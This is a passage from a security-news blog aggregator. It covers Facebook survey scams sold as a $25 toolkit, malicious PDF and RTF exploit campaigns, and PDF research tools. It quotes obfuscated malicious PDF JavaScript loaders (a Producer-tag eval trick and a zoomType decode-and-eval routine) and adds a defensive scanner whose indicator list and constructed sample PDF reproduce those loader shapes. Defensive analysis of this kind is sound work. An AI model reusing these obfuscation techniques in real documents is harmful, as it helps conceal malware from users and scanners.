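if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

The captured array is the decoded iframe string, exactly what the alert() in test.html shows, with the difference that nothing the script does can reach a real DOM or a real eval. The same parameter-shadowing trick works for document.write, setTimeout and unescape when a sample routes its final stage through one of those instead of eval.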

Happy Decoding

Umesh

Posted in Security

Malicious Facebook trick has victims create own scam

A new malicious Facebook campaign comes with an added bonus — the chance to spread your very own scam.

Scams advertising applications such as “Profile Creeps” and “Creeper Tracker” are luring in Facebook users interested in finding out who is viewing their profiles.

“I just saw who STALKS me on Facebook! You can see who creeps around your profile too!” reads one of the scam messages.

This ploy has been seen several times; it works well because it’s a social engineering trick designed to play into people’s inherent curiosities and insecurities. But this one has an added element.

Users who fall for this trick are directed to a survey page, in which completed user surveys generate money for the scammers. After the survey is taken, the scammers turn the tables and offer the scam software directly to the victims.

For $25, the victim can purchase a toolkit called “Tinie app,” which includes step-by-step directions on how to virally spread your own Facebook scam.

“This phenomenon of template Facebook applications like Tinie app shows how the spamming culture is consolidating more and more around Facebook,” said the security firm Websense.

Putting the cybercrime tools in the hands of those who’ve been duped could have disastrous – or at the very least annoying – consequences.

It could, for example, allow fledgling Facebook hackers to infiltrate the accounts of five Missouri state representatives including Stacey Newman, Dave Schatz and Donna Lichtenegger, and post messages such as “I love lobbyist! All the free food and stuff you get. This job is awesome!” according to the security firm Sophos.

Lichtenegger admitted that on the day her account was taken over, she had been accessing Facebook via the Missouri State Capitol building’s free public Wi-Fi.

While Facebook’s newly released secure browsing option — in which users can access the site using an encrypted HTTPS connection — could have helped the legislators, Softpedia reports that the feature contains a bug that disables it whenever a non-secure app is called upon.

A newbie Facebook scammer with the $25 toolkit could also post a message claiming to have a video of a father catching his daughter stripping for a webcam.

The scam, which is currently spreading through Facebook, comes with a message that reads “OMG she is so busted!! Dad Catches Daughter on Webcam!” and includes a link to the supposed racy video, Sophos reported.

The link directs users instead to a rogue application that attempts to access users’ personal information and post the fake webcam message to their walls.


© 2011 SecurityNewsDaily. All rights reserved.

Posted in Facebook

Viral and Malicious Facebook application for $25

Last weekend a viral rogue app campaign hit Facebook again. This time the application was called "Profile Creeps" which, like many other rogue applications before it, promises to do what Facebook simply doesn't allow *ANY* app to do – let us know who looks at our profile. But users are still tricked into installing apps that promise to do just this. And just like most others, the latest one leads to a survey that in the end generates money for the people behind the app.

Viral Facebook Application Toolkits


Spam campaigns such as this one appear on an almost daily or weekly basis. You might ask yourself: is everybody now becoming a Facebook developer and trying to make tons of cash unleashing those annoying surveys? In essence, the answer is both a "yes" and a "no". No, not everybody is a Facebook developer; yes, it's very easy to become one, or to pretend to be one. You don't have to be a developer: a mere $25 buys you a Facebook viral application toolkit with which to unleash all the unwanted content you want onto Facebook.

As an example, let's look at a very similar fraudulent application that "can" allow Facebook users to know who "creeps" at their profile, called "Facebook Profile Creeper Tracker Pro". The application asks for some permissions, shows an online survey/advertisements and tells the user at the end of the process that he/she is the one who looks at his/her own profile the most. In other words, this application should be revoked according to the terms and conditions of Facebook.

"Facebook Profile Creeper Tracker Pro" and similar fraudulent applications process:



This application was built with a pre-defined toolkit called "Tinie app", a Facebook viral application template available in several variations for only $25 or even less. The next image is one of the template images in the toolkit that aims to give some directions to the buyer, besides the full-blown step-by-step guide that comes with the kit itself:

The buyer doesn't have to have development experience with Facebook, he/she just needs to follow the accompanying instructions and a working viral Facebook application is at their disposal. One of the sellers of the application describes its purpose pretty well:

If you're wondering what CPA lead is, it's the abbreviation of Cost Per Action. It's a program that any Web content publisher can join that allows them to install a survey on their site in order to make money. The payout from such programs is typically around $0.20 to $2.00 per completed action, sometimes more or less.

This phenomenon of template Facebook applications like Tinie app shows how the spamming culture is consolidating more and more around Facebook, adapting to the platform and increasing what we call Web spam.

To protect yourself from malicious URL links and spam posts being made to your Facebook wall, try our free Defensio Facebook app.  You can download it from Defensio.com.

Posted in Security

Surrounded by Malicious PDFs

Malicious PDF files and related exploits are invading the Net. Looking at the CVE records in the National Vulnerability Database for Adobe products, we see a dramatic increase in 2009.

Since January 1, Adobe vulnerabilities have continued to appear. During this period, five are classified as medium, while about 30 are judged high-level threats.

Now we find the Zeus botnet is also taking advantage of a PDF flaw: this vulnerability, along with about 15 others, is now covered by the recent patch (ABSB10-09).

In 2007 and at the beginning of 2008 most of the exploit samples in our malware collections were linked to HTML/iframe, WMF, or DCOM vulnerabilities.

Today malware involving malformed PDF files is legion. From less than 2 percent of malware directly connected to exploits in 2007 and 2008, such files reached 17 percent in 2009 and 28 percent during the first quarter of 2010. For Adobe Reader software, 2010 seems to be the year of living dangerously.

View full post on McAfee Avert Labs

Posted in Antivirus

Adobe Reader X stops malicious PDF spam campaign dead in its tracks

A new malicious spam campaign underlines the security benefits of upgrading to the latest version of Adobe Reader – Adobe Reader X.

SophosLabs are currently seeing reports of a low-level attack, spamming out malicious PDF attachments. Sophos products detect the attack as Mal/PDFEx-J.

The dangerous attached files use filenames of the form DD-MM-YYYY-NN.pdf (in other words, a date with a two digit number attached).

The emails typically look like this:

Hello, [recipient email]

It was scanned and sent to you using Xerox WorkCentre Pro.
Please open the attached document.

Sent by: Guest
Number of Images: 1 Attachment
File Type: PDF.
WorkCentre Pro Location: Machine location not set

I took a look at one sample of this family of malware (sha1:ef175336502a0216b4d0830944bc36e8155e0475) in order to see what would happen if I opened it with different versions of Adobe Reader.

When opened by Adobe Reader 8, the PDF displayed nothing but attempted to download and run malicious code from a Colombian TLD.

However, when I opened the same file with Adobe Reader X no attack occurs and an error message is displayed:

Adobe X error message

Other variants (also detected as Troj/PDFJs-QB) download and run a fake anti-virus attack that Sophos intercepts as Mal/FakeAV-EA.

The malicious code is stored within the Producer tag:

Malicious code

and accessed via this.producer:

var qweval=5;
for(var i in this) {
	if (i.indexOf('qwe') != -1) {
		jbka=this[i.replace('qw','')];
	}
}
jbka('cck=this.producer');
xswi=jbka(cck.substr(0,19));
...

Hiding code within other parts of PDF files isn’t a new trick and if you want to find out more about PDF threats then look at my earlier article: “PDF security under the microscope: A review of OMG-WTF-PDF”.

It appears that an update introduced in Adobe Reader X has broken a fundamental part of this threat. Well done Adobe!

For this reason, I would urge users and system administrators responsible for protecting firms to consider updating to Adobe Reader X as soon as possible.

Last year, my colleague Chet Wisniewski interviewed Adobe security chief Brad Arkin about all matters Adobe, including the then-upcoming Reader X. Take a listen below if you want to hear more about how Adobe is tackling security issues with its products.

(23 August 2010, duration 24:36 minutes, size 11.3MBytes)

You can also download this podcast directly in MP3 format: Chet Wisniewski interviews Adobe’s Brad Arkin. All of our past podcasts are available from http://podcasts.sophos.com and on iTunes.

Full story: Naked Security – Sophos

Posted in Sophos

Malicious PDF trick: zoomType

Here is another small trick that malicious PDFs use. The PDF contains
JavaScript code similar to the following:

var part1="pe";
var part2="Ty";
var part3="o";
var part4="get";
var part5="xOf";
var fun1= event["tar"+part4]["z"+part3+part3+"m"+part2+part1];
fun1 = varka_tipo[1]+"nde"+part5;
var fun2 = "fromCharCode";
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
    "abcdefghijklmnopqrstuvwxyz" +
    "0123456789"+
    "+/=";

function decode(input) {
    ...
    enc1 = keyStr[fun1](input.charAt(i++));
    ...
}

var code = decode("Q2!#$  %^&5a...#$  %^&o=!#$  %^&");
eval(code);

This script sets up some variables that are used in a decoding
routine. As usual, the routine decodes a long string and the
result is then interpreted via eval().

The interesting part is how fun1 is computed. Undoing the simple
obfuscation shows that it is initialized to event.target.zoomType.
Now, event.target is a reference to the Doc object. The Doc object’s
property zoomType contains the current zoom type of the document. The
documentation lists 7 possible values:

  • NoVary
  • FitPage
  • FitWidth
  • FitHeight
  • FitVisibleWidth
  • Preferred
  • ReflowWidth

Adobe Reader seems to return FitWidth by default.
The next step in the script extracts the second character from the zoom
type string (the letter i) and concatenates it with other strings to obtain
indexOf.

A long way to get an i
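An added example that serves both this post and the Sophos Producer-tag post above; it is not code from either author. It scans a PDF's raw bytes for the string objects that follow the /Producer and /JS keys, decodes PDF literal and hex strings, undoes the two cheap string-assembly tricks shown here ("a"+"b" and x["name"]) before matching, and reports which indicators hit. The sample PDF, the indicator list and the normalisation rules are my construction; /Producer, /JS, /OpenAction and /Next are standard PDF keys.

```javascript
// Added example (not from either post). Static scan of a PDF's /Producer
// metadata string and /JS action strings for the indicators the two posts
// describe. SAMPLE_PDF is CONSTRUCTED and minimal; real files need xref and
// stream handling (FlateDecode'd object streams hide these keys from a raw
// scan, so inflate streams first).
const INDICATORS = [
  "eval", "fromCharCode", "this.producer", "zoomType", "event.target",
  "unescape", "indexOf", "replace(",
];

// Decode a PDF literal string body: \( \) \\ \n \r \t and \ddd octal escapes.
function decodeLiteral(body) {
  const named = { n: "\n", r: "\r", t: "\t" };
  return body.replace(/\\(\d{1,3}|[\s\S])/g, (_, e) =>
    /^\d/.test(e) ? String.fromCharCode(parseInt(e, 8)) : (named[e] || e));
}

// Decode a PDF hex string body such as 48656C6C6F (odd trailing digit -> x0).
function decodeHex(body) {
  const clean = body.replace(/\s+/g, "");
  let out = "";
  for (let i = 0; i < clean.length; i += 2) {
    out += String.fromCharCode(parseInt(clean.substr(i, 2).padEnd(2, "0"), 16));
  }
  return out;
}

// Every string object that directly follows /<key> in the raw PDF. Literal
// strings may nest balanced parentheses, so depth is tracked and backslash
// escapes are skipped rather than counted.
function extractKeyStrings(pdf, key) {
  const values = [];
  let pos = 0;
  for (;;) {
    const at = pdf.indexOf("/" + key, pos);
    if (at < 0) break;
    let i = at + key.length + 1;
    while (i < pdf.length && /\s/.test(pdf[i])) i++;
    if (pdf[i] === "(") {
      let depth = 1, j = i + 1, body = "";
      while (j < pdf.length) {
        const ch = pdf[j];
        if (ch === "\\") { body += ch + (pdf[j + 1] || ""); j += 2; continue; }
        if (ch === "(") depth++;
        if (ch === ")" && --depth === 0) break;
        body += ch; j++;
      }
      values.push(decodeLiteral(body));
      pos = j + 1;
    } else if (pdf[i] === "<" && pdf[i + 1] !== "<") {
      const end = pdf.indexOf(">", i);
      values.push(decodeHex(pdf.slice(i + 1, end < 0 ? pdf.length : end)));
      pos = end < 0 ? pdf.length : end + 1;
    } else {
      pos = i; // an indirect reference or other object; keep searching
    }
  }
  return values;
}

// Undo the two cheap tricks the zoomType post shows before matching:
// "a"+"b" -> "ab" and x["name"] -> x.name. Names built from variables
// (part1, part2, ...) survive this and need an instrumented engine instead.
function normalizeJs(src) {
  return src
    .replace(/(["'])\s*\+\s*\1/g, "")
    .replace(/\[(["'])([A-Za-z_$][\w$]*)\1\]/g, ".$2");
}

function scanPdf(pdf) {
  const findings = [];
  for (const key of ["Producer", "JS"]) {
    for (const raw of extractKeyStrings(pdf, key)) {
      const value = normalizeJs(raw);
      const hits = INDICATORS.filter((ind) => value.includes(ind));
      if (hits.length) findings.push({ key, hits, preview: value.slice(0, 60) });
    }
  }
  return findings;
}

// Constructed sample: code parked in /Producer, a loader of the shape the
// Sophos post shows reading it back via this.producer, and a split-string
// event.target.zoomType lookup like the one in Marco's post.
const SAMPLE_PDF = `%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /Producer (var s=String.fromCharCode(80,76,65,67,69,72,79,76,68,69,82);eval(s);) >> endobj
4 0 obj << /S /JavaScript /JS (var qweval=5;for\\(var i in this\\){if\\(i.indexOf\\('qwe'\\)!=-1\\){jbka=this[i.replace\\('qw',''\\)];}}jbka\\('cck=this.producer'\\);) /Next 5 0 R >> endobj
5 0 obj << /S /JavaScript /JS (var fun1=event["tar"+"get"]["z"+"o"+"o"+"m"+"Ty"+"pe"];) >> endobj
trailer << /Root 1 0 R /Info 3 0 R >>
%%EOF
`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(scanPdf(SAMPLE_PDF), null, 2));
}
```

On the sample this yields three findings: eval and fromCharCode inside /Producer, the this.producer loader in the first /JS action, and zoomType plus event.target in the second once the "tar"+"get" pieces are glued back together. A raw substring match would have missed the last one, which is the point of the zoomType trick; a lookup assembled from variables, as in the post's part1 … part5, defeats even the normalisation and has to be resolved by running the script in an instrumented engine.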

Full story: Marco’s Blog

Posted in Security

Blog: Malicious ads through ICQ

ICQ client used to push malicious ads that lead to fake anti-virus.

Full story: Securelist / All Updates

Posted in Antivirus

New Year themed Malicious Email on the Prowl

Websense Security Labs™ ThreatSeeker™ Network has discovered a slew of New Year-themed malicious emails circulating today.  Websense customers are being protected proactively against this ongoing malicious spam campaign by ACE, our Advanced Classification Engine.


Full story: Security Labs

Posted in Antivirus

Releasing malpdfobj (malicious PDF described in a JSON object)

About a month ago I posted a blog describing research I was doing on malicious PDF files. As part of this research I needed a way to represent a malicious PDF file in a queryable form. I ultimately decided on MongoDB as my backend and therefore wanted to get the malicious file in a JSON form so I could store it.

The tool I just released today is a composite of tools from myself and Didier Stevens. Didier’s PDF tools have done a lot of the heavy lifting, but my glue code brings multiple pieces of data into a single object. As of right now the object contains the following details:


Full story: Offensive Computing blogs

Posted in Security


Malicious .RTF Files Exploit Microsoft Office Vulnerability

A stack-based buffer overflow vulnerability in Microsoft Office was recently discovered to have been actively exploited in the wild. Trend Micro now detects the exploit .RTF files as TROJ_ARTIEF.SM.

The malicious .RTF files contain shellcode designed to overflow the stack and crash Microsoft Word. As a result, malicious users can execute arbitrary commands on an affected system.


From the screenshot, we can see that the malware employed a NOP sled to overflow the buffer and execute code in the context of Microsoft Word. The malware we encountered dropped another malicious file detected as TROJ_INJECT.ART.

One of the more serious concerns is that a malicious user could send an RTF email to target users. Since Microsoft Outlook uses Word to handle email messages, the mere act of opening or viewing specially crafted messages in the reading pane may cause the exploit code to execute.

Microsoft already released an update to address the said vulnerability. Users are strongly advised to download and install the patch, which can be found in the official bulletin MS10-087. This was issued as part of November’s Patch Tuesday.


– Karl Dominguez (Threat Response Engineer) on TrendLabs | Malware Blog – by Trend Micro

Posted in Antivirus

Blog: A malicious addition to a Facebook link

In the last few days we have discovered that spam messages with malicious links are being sent via instant messenger services – on Securelist / All Updates

Posted in Antivirus

Detecting Malicious PDF Files

For the past few days I have been completely immersing myself in PDF research in the hope of finding better ways to detect malicious PDF files. I have collected a pretty good random sample set (15K) of PDF data and have a bunch of malicious files with the same statistics. I have written some basic tools to aid in my research and it would be nice to get some input on the results I have found so far.

The outline of the project can be found here:

http://pdfxray.9bplus.com/

The blog with all the research, data and tools that have been released can be found here:

http://blog.9bplus.com

– x0ner on Offensive Computing blogs

Posted in Security

Blog: Malicious Twitter trends

New attack via Twitter is in progress – on Securelist / All Updates

Posted in Antivirus
